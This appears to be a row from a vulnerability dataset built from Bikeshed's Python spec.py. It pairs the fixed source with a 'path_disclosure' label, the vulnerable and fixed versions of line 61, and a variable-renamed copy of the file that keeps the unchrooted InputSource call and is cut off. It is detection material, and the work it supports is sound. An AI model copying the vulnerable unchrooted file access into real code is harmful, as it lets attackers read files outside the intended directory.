.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-text);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-text);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
styleDarkMode += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-text: black;
--selflink-bg: silver;
--selflink-hover-text: white;
}
}
"""
styleCounters = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec:
def __init__(
self,
inputFilename,
debug=False,
token=None,
lineNumbers=False,
fileRequester=None,
testing=False,
):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(inputFilename, chroot=constants.chroot)
self.transitiveDependencies = set()
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = styleColors
self.extraStyles["style-darkmode"] = styleDarkMode
self.extraStyles["style-md-lists"] = styleMdLists
self.extraStyles["style-autolinks"] = styleAutolinks
self.extraStyles["style-selflinks"] = styleSelflinks
self.extraStyles["style-counters"] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def recordDependencies(self, *inputSources):
self.transitiveDependencies.update(inputSources)
def preprocess(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
computedMdText = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
macros=jsonEscapedMacros,
)
self.mdOverridingDefaults = metadata.fromJson(
data=computedMdText, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def processDocument(self):
# Fill in and clean up a bunch of data
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
# Add MDN panels after all IDs/anchors have been added
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith(
"http://lists.w3.org"
):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith(
"http://lists.w3.org"
):
el.text = "https" + text[4:]
# Loaded from .include files
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def serialize(self):
try:
rendered = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None, newline=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
sys.stdout.write(rendered)
else:
with open(
outputFilename, "w", encoding="utf-8", newline=newline
) as f:
f.write(rendered)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
outputFilename,
e,
)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts["fatal"]
links = messageCounts["linkerror"]
warnings = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer
)
print(f"Serving at port {port}")
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
# Comparing mtimes with "!=" handles when a file starts or
# stops existing, and it's fine to rebuild if an mtime
# somehow gets older.
if any(
input.mtime() != lastModified
for input, lastModified in lastInputModified.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as h.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
"""
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
"""
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleColors = """
/* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--text: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-text: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #3980b5;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #005a9c;
--hr-text: var(--text);
--algo-border: #def;
--del-text: red;
--del-bg: transparent;
--ins-text: #080;
--ins-bg: transparent;
--a-normal-text: #034575;
--a-normal-underline: #bbb;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-text: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-text: var(--text);
--issueheading-text: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-text: var(--text);
--exampleheading-text: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-text: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-text: var(--text);
--advisementheading-text: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-text: var(--text);
--amendmentheading-text: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-text: var(--text);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-text: #707070;
--indextable-hover-text: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
styleDarkMode = """
@media (prefers-color-scheme: dark) {
:root {
--text: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #080808;
--tocnav-active-text: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #6af;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #8af;
--hr-text: var(--text);
--algo-border: #456;
--del-text: #f44;
--del-bg: transparent;
--ins-text: #4a4;
--ins-bg: transparent;
--a-normal-text: #6af;
--a-normal-underline: #555;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-text: #f44;
--a-active-underline: var(--a-active-text);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-text: var(--text);
--issueheading-text: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-text: var(--text);
--exampleheading-text: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-text: var(--text);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-text: var(--text);
--advisementheading-text: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-text: var(--text);
--amendmentheading-text: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-text: var(--text);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-text: #aaa;
--indextable-hover-text: var(--text);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
styleMdLists = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
styleAutolinks = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-text);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
styleSelflinks = """
:root {
--selflink-text: white;
--selflink-bg: gray;
--selflink-hover-text: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-text);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-text);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
styleDarkMode += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-text: black;
--selflink-bg: silver;
--selflink-hover-text: white;
}
}
"""
styleCounters = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| path_disclosure | {
"code": [
" self.inputSource = InputSource(inputFilename)"
],
"line_no": [
61
]
} | {
"code": [
" self.inputSource = InputSource(inputFilename, chroot=constants.chroot)"
],
"line_no": [
61
]
} | import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class CLASS_0:
def __init__(
self,
VAR_6,
VAR_7=False,
VAR_8=None,
VAR_9=False,
VAR_10=None,
VAR_11=False,
):
self.valid = False
self.lineNumbers = VAR_9
if VAR_9:
constants.dryRun = True
if VAR_6 is None:
VAR_6 = FUNC_0()
if VAR_6 is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(VAR_6)
self.transitiveDependencies = set()
self.debug = VAR_7
self.token = VAR_8
self.testing = VAR_11
if VAR_10 is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = VAR_10
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def FUNC_1(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(VAR_10=self.dataFile, VAR_11=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = VAR_0
self.extraStyles["style-darkmode"] = VAR_1
self.extraStyles["style-md-lists"] = VAR_2
self.extraStyles["style-autolinks"] = VAR_3
self.extraStyles["style-selflinks"] = VAR_4
self.extraStyles["style-counters"] = VAR_5
self.extraScripts = defaultdict(str)
try:
VAR_31 = self.inputSource.read()
self.lines = VAR_31.lines
if VAR_31.date is not None:
self.mdBaseline.addParsedData("Date", VAR_31.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def FUNC_2(self, *VAR_12):
self.transitiveDependencies.update(VAR_12)
def FUNC_3(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def FUNC_4(self):
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
self.md.fillTextMacros(self.macros, doc=self)
VAR_22 = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
VAR_23 = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
VAR_29=VAR_22,
)
self.mdOverridingDefaults = metadata.fromJson(
data=VAR_23, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
self.md.computeImplicitMetadata(doc=self)
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
self.refs.setSpecData(self.md)
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def FUNC_5(self):
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
cleanupHTML(self)
if self.md.prepTR:
for VAR_19 in findAll("[rel ~= 'icon']", self):
removeNode(VAR_19)
for VAR_19 in findAll("link", self):
if VAR_19.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), VAR_19)
for VAR_19 in findAll("a", self):
VAR_35 = VAR_19.get("href", "")
if VAR_35.startswith("http://www.w3.org") or VAR_35.startswith(
"http://lists.w3.org"
):
VAR_19.set("href", "https" + VAR_35[4:])
VAR_17 = VAR_19.text or ""
if VAR_17.startswith("http://www.w3.org") or VAR_17.startswith(
"http://lists.w3.org"
):
VAR_19.text = "https" + VAR_17[4:]
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def FUNC_6(self):
try:
VAR_24 = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
VAR_24 = finalHackyCleanup(VAR_24)
return VAR_24
def FUNC_7(self, VAR_13):
if VAR_13 is None:
if not isinstance(self.inputSource, FileInputSource):
VAR_13 = "-"
elif self.inputSource.sourceName.endswith(".bs"):
VAR_13 = self.inputSource.sourceName[0:-3] + ".html"
